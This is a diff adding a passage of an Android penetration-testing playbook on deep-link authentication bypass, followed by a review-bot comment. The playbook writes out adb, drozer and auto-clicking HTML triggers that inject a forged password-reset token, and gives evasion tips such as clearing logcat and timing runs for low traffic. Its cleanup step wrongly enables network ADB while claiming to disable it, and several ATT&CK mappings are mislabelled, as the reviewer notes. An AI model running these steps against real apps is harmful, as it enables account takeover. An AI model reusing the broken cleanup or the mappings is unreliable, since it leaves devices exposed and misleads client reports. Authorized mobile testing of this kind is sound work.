|
+
|
|
295
|
+
# Test direct access to authenticated screens
|
|
296
|
+
adb shell am start \
|
|
297
|
+
-a android.intent.action.VIEW \
|
|
298
|
+
-d "myapp://dashboard" \
|
|
299
|
+
com.example.myapp
|
|
300
|
+
|
|
301
|
+
# Test privileged action trigger
|
|
302
|
+
adb shell am start \
|
|
303
|
+
-a android.intent.action.VIEW \
|
|
304
|
+
-d "myapp://reset-password?token=INJECTED" \
|
|
305
|
+
-n com.example.myapp/.ResetPasswordActivity
|
|
306
|
+
```
|
|
307
|
+
|
|
308
|
+
**Expected output on success:**
|
|
309
|
+
```
|
|
310
|
+
Starting: Intent { act=android.intent.action.VIEW dat=myapp://reset-password?token=INJECTED_TOKEN cmp=com.example.myapp/.ResetPasswordActivity }
|
|
311
|
+
```
|
|
312
|
+
|
|
313
|
+
The target activity launches. Observe the device screen.
|
|
314
|
+
|
|
315
|
+
**Fallback — trigger via HTML page (browser-based):**
|
|
316
|
+
```bash
|
|
317
|
+
# Create a trigger page and serve it
|
|
318
|
+
cat > /tmp/trigger.html << 'EOF'
|
|
319
|
+
<html>
|
|
320
|
+
<body>
|
|
321
|
+
<a href="myapp://reset-password?token=INJECTED" id="link">Click</a>
|
|
322
|
+
<script>document.getElementById('link').click();</script>
|
|
323
|
+
</body>
|
|
324
|
+
</html>
|
|
325
|
+
EOF
|
|
326
|
+
|
|
327
|
+
# Push to device and open in browser
|
|
328
|
+
adb push /tmp/trigger.html /sdcard/trigger.html
|
|
329
|
+
adb shell am start -a android.intent.action.VIEW -d "file:///sdcard/trigger.html"
|
|
330
|
+
```
|
|
331
|
+
|
|
332
|
+
**Fallback — drozer intent trigger:**
|
|
333
|
+
```bash
|
|
334
|
+
# Connect drozer agent on device
|
|
335
|
+
adb forward tcp:31415 tcp:31415
|
|
336
|
+
drozer console connect
|
|
337
|
+
|
|
338
|
+
# Send intent via drozer
|
|
339
|
+
run app.activity.start \
|
|
340
|
+
--action android.intent.action.VIEW \
|
|
341
|
+
--data-uri "myapp://reset-password?token=INJECTED" \
|
|
342
|
+
--component com.example.myapp com.example.myapp.ResetPasswordActivity
|
|
343
|
+
```
|
|
344
|
+
|
|
345
|
+
---
|
|
346
|
+
|
|
347
|
+
### Step 7: Confirm Authentication Bypass and Access
|
|
348
|
+
|
|
349
|
+
**Observe on device:**
|
|
350
|
+
- Does the app navigate to the password reset screen without sending an email?
|
|
351
|
+
- Does the app allow setting a new password with the injected token?
|
|
352
|
+
- Does the app navigate to a dashboard/protected screen without login?
|
|
353
|
+
|
|
354
|
+
**Capture evidence:**
|
|
355
|
+
|
|
356
|
+
```bash
|
|
357
|
+
# Screenshot the result
|
|
358
|
+
adb shell screencap -p /sdcard/bypass_evidence.png
|
|
359
|
+
adb pull /sdcard/bypass_evidence.png ./evidence/m005_bypass_$(date +%Y%m%d_%H%M%S).png
|
|
360
|
+
|
|
361
|
+
# Screen record the full attack flow
|
|
362
|
+
adb shell screenrecord /sdcard/attack_flow.mp4 &
|
|
363
|
+
RECORD_PID=$!
|
|
364
|
+
# ... execute the attack steps ...
|
|
365
|
+
kill $RECORD_PID
|
|
366
|
+
adb pull /sdcard/attack_flow.mp4 ./evidence/
|
|
367
|
+
|
|
368
|
+
# Capture logcat output during the attack for PoC
|
|
369
|
+
adb logcat -c # clear log buffer
|
|
370
|
+
adb shell am start -a android.intent.action.VIEW -d "myapp://reset-password?token=INJECTED" com.example.myapp
|
|
371
|
+
adb logcat -d > ./evidence/logcat_m005.txt
|
|
372
|
+
```
|
|
373
|
+
|
|
374
|
+
**Capture network traffic (optional — validate no server-side verification):**
|
|
375
|
+
```bash
|
|
376
|
+
# If using Burp Suite proxy on device
|
|
377
|
+
adb shell settings put global http_proxy <burp_ip>:8080
|
|
378
|
+
# Then trigger the deep link and check Burp for outgoing verification requests
|
|
379
|
+
# Absence of verification request = confirmed client-side only validation
|
|
380
|
+
```
|
|
381
|
+
|
|
382
|
+
---
|
|
383
|
+
|
|
384
|
+
## Real-World Reference
|
|
385
|
+
|
|
386
|
+
**Attack:** `myapp://reset-password?token=INJECTED` triggers password reset without email verification.
|
|
387
|
+
|
|
388
|
+
**Flow breakdown:**
|
|
389
|
+
1. Legitimate flow: User clicks email link → `myapp://reset-password?token=<server_generated_token>` → app validates token with backend → allows password reset
|
|
390
|
+
2. Attack flow: Attacker triggers `myapp://reset-password?token=INJECTED` via ADB → app reads token from URI → proceeds without backend validation → password reset screen accessible without email
|
|
391
|
+
|
|
392
|
+
**Historical real-world cases:**
|
|
393
|
+
- **Grab (2019):** Deep link injection allowed account takeover via forged ride-booking deep links
|
|
394
|
+
- **Airbnb (HackerOne):** OAuth token leakage via deep link interception in third-party apps
|
|
395
|
+
- **Facebook (2014):** Deep link exposed authenticated WebViews to external URI schemes
|
|
396
|
+
- **Starbucks:** Deep link allowed order placement without authentication on certain endpoints
|
|
397
|
+
- **CVE-2020-0096:** StrandHogg — malicious apps intercept deep links via task affinity hijacking
|
|
398
|
+
|
|
399
|
+
---
|
|
400
|
+
|
|
401
|
+
## MITRE ATT&CK Mapping
|
|
402
|
+
|
|
403
|
+
| Step | Tactic | Technique | Sub-technique | Description |
|
|
404
|
+
|---|---|---|---|---|
|
|
405
|
+
| 1 — Pull & decompile APK | Reconnaissance | T1430 — Location Tracking (adapt: app recon) | — | Gathering information about target application structure |
|
|
406
|
+
| 2 — Extract AndroidManifest | Discovery | T1418 — Software Discovery | T1418.001 — Security Software Discovery | Enumerating application components and attack surface |
|
|
407
|
+
| 3 — Analyze deep link handlers | Discovery | T1420 — File and Directory Discovery | — | Examining app code for authentication logic weaknesses |
|
|
408
|
+
| 4 — Craft malicious deep link | Resource Development | T1587 — Develop Capabilities | T1587.001 — Malware (adapt: crafted payload) | Constructing the injection payload |
|
|
409
|
+
| 5 — Trigger via ADB | Execution | T1626 — Abuse Elevation Control Mechanism | T1626.001 — Setuid and Setgid (adapt: intent abuse) | Delivering the malicious intent to the target activity |
|
|
410
|
+
| 6 — Bypass authentication flow | Defense Evasion | T1626 — Abuse Elevation Control Mechanism | — | Circumventing authentication controls via direct activity launch |
|
|
411
|
+
| 7 — Access protected screens | Initial Access / Privilege Escalation | T1078 — Valid Accounts | T1078.001 — Default Accounts (adapt: bypassed auth) | Gaining unauthorized access to authenticated application state |
|
|
412
|
+
|
|
413
|
+
---
|
|
414
|
+
|
|
415
|
+
## Detection & OPSEC
|
|
416
|
+
|
|
417
|
+
### How This Attack Is Detected
|
|
418
|
+
|
|
419
|
+
| Detection Point | Signal | Detection Tool |
|
|
420
|
+
|---|---|---|
|
|
421
|
+
| ADB connection | USB debugging auth prompt on device; ADB daemon logs | Device OS / MDM |
|
|
422
|
+
| `am start` commands | Android system logs (`adb logcat ActivityManager`) capture intent launches with source `adb` tag | SIEM with mobile log ingestion |
|
|
423
|
+
| Unexpected activity launch | Activity launched without preceding login flow; no valid session token in memory | App-level analytics / RASP |
|
|
424
|
+
| Network anomaly | Password reset flow triggered with no preceding email-click event | Server-side analytics |
|
|
425
|
+
| Frida / hooking | Frida gadget or server process visible in device process list | EDR / MTD solutions |
|
|
426
|
+
|
|
427
|
+
### Reducing Detection Risk During Authorized Engagement
|
|
428
|
+
|
|
429
|
+
- **Minimize ADB footprint:** Use `adb shell am start` only; avoid installing additional tools on device
|
|
430
|
+
- **Clear logcat before and after:** `adb logcat -c` to remove pre-existing logs; note this itself may be logged by MDM
|
|
431
|
+
- **Use physical trigger over ADB-over-network:** ADB-over-TCP (port 5555) is more detectable than USB ADB
|
|
432
|
+
- **Time execution during low-traffic windows** to avoid anomaly detection on server-side authentication logs
|
|
433
|
+
- **Validate scope:** Confirm the specific device UDID and app version are in scope before connecting
|
|
434
|
+
- **Use screen recording instead of screenshots** to document without generating multiple artifact files on device
|
|
435
|
+
|
|
436
|
+
### Artifacts Left Behind
|
|
437
|
+
|
|
438
|
+
| Artifact | Location | Notes |
|
|
439
|
+
|---|---|---|
|
|
440
|
+
| ADB auth RSA key | `/data/misc/adb/adb_keys` (device) | Device trusts your host permanently until removed |
|
|
441
|
+
| Logcat entries | Android system log (volatile, overwrites) | Survives if MDM collects logs |
|
|
442
|
+
| Screencap / screenrecord files | `/sdcard/` on device | Must be manually cleaned |
|
|
443
|
+
| trigger.html | `/sdcard/trigger.html` | If browser-based trigger method used |
|
|
444
|
+
| Network request logs | Server-side (password reset attempts) | Outside attacker control — log with caution |
|
|
445
|
+
| Frida server binary | `/data/local/tmp/frida-server` (if used) | Must be removed |
|
|
446
|
+
|
|
447
|
+
---
|
|
448
|
+
|
|
449
|
+
## Cleanup
|
|
450
|
+
|
|
451
|
+
```bash
|
|
452
|
+
# 1. Remove files pushed to device
|
|
453
|
+
adb shell rm -f /sdcard/bypass_evidence.png
|
|
454
|
+
adb shell rm -f /sdcard/attack_flow.mp4
|
|
455
|
+
adb shell rm -f /sdcard/trigger.html
|
|
456
|
+
|
|
457
|
+
# 2. Remove Frida server if deployed
|
|
458
|
+
adb shell rm -f /data/local/tmp/frida-server
|
|
459
|
+
|
|
460
|
+
# 3. Remove ADB authorization from device
|
|
461
|
+
# On device: Settings → Developer Options → Revoke USB debugging authorizations
|
|
462
|
+
|
|
463
|
+
# 4. Remove your ADB key from device authorized keys (requires root or factory reset)
|
|
464
|
+
# adb shell su -c "rm /data/misc/adb/adb_keys" # root only
|
|
465
|
+
|
|
466
|
+
# 5. Clear logcat buffer on device
|
|
467
|
+
adb logcat -c
|
|
468
|
+
|
|
469
|
+
# 6. Disable ADB over TCP if it was enabled during engagement
|
|
470
|
+
adb tcpip 5555 # Was enabled — disable by rebooting device or:
|
|
471
|
+
adb shell setprop service.adb.tcp.port -1
|
|
472
|
+
adb shell stop adbd
|
|
473
|
+
adb shell start adbd
|
|
474
|
+
|
|
475
|
+
# 7. Restore proxy settings if modified for Burp
|
|
476
|
+
adb shell settings delete global http_proxy
|
|
477
|
+
adb shell settings delete global global_http_proxy_host
|
|
478
|
+
adb shell settings delete global global_http_proxy_port
|
|
479
|
+
|
|
480
|
+
# 8. Verify cleanup
|
|
481
|
+
adb shell ls /sdcard/ | grep -E "evidence|trigger|attack"
|
|
482
|
+
adb shell ls /data/local/tmp/ | grep frida
|
|
483
|
+
|
|
484
|
+
# 9. Disconnect ADB
|
|
485
|
+
adb disconnect
|
|
486
|
+
```
|
|
487
|
+
|
|
488
|
+
---
|
|
489
|
+
|
|
490
|
+
## References
|
|
491
|
+
|
|
492
|
+
| Resource | URL |
|
|
493
|
+
|---|---|
|
|
494
|
+
| Android Deep Links Documentation | https://developer.android.com/training/app-links/deep-linking |
|
|
495
|
+
| Android Intent Security (OWASP MASTG) | https://mas.owasp.org/MASTG/tests/android/MASVS-PLATFORM/MASTG-TEST-0028/ |
|
|
496
|
+
| OWASP Mobile Top 10 — M1: Improper Credential Usage | https://owasp.org/www-project-mobile-top-10/ |
|
|
497
|
+
| apktool | https://apktool.org/ |
|
|
498
|
+
| jadx | https://github.com/skylot/jadx |
|
|
499
|
+
| drozer | https://github.com/WithSecureLabs/drozer |
|
|
500
|
+
| Frida | https://frida.re/ |
|
|
501
|
+
| MITRE T1626 — Abuse Elevation Control Mechanism | https://attack.mitre.org/techniques/T1626/ |
|
|
502
|
+
| MITRE T1078 — Valid Accounts | https://attack.mitre.org/techniques/T1078/ |
|
|
503
|
+
| ADB Documentation | https://developer.android.com/tools/adb |
|
|
504
|
+
| HackerOne Reports — Deep Link Vulnerabilities | https://hackerone.com/reports?query=deep+link |
|
|
505
|
+
| Android Security Bulletin | https://source.android.com/docs/security/bulletin |
|
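Review bot: Cleanup step 6 runs `adb tcpip 5555` under the comment "Disable ADB over TCP if it was enabled during engagement", but that command puts adbd into TCP mode on port 5555. Anyone who runs the block as written leaves the test device listening for network ADB instead of closing it. Remove that line and use `adb usb` to return adbd to USB mode. The `adb shell stop adbd` / `adb shell start adbd` pair that follows is issued over the same ADB connection it stops, so the second command cannot be relied on to reach the device. Step 8 should also verify that TCP ADB is off, not only that the files are gone. Separately, the ATT&CK mapping table labels T1626.001 as "Setuid and Setgid" and maps APK decompilation to T1430 (Location Tracking); check each ID and name against the Mobile matrix, since findings written from this skill will carry those mappings into client reports.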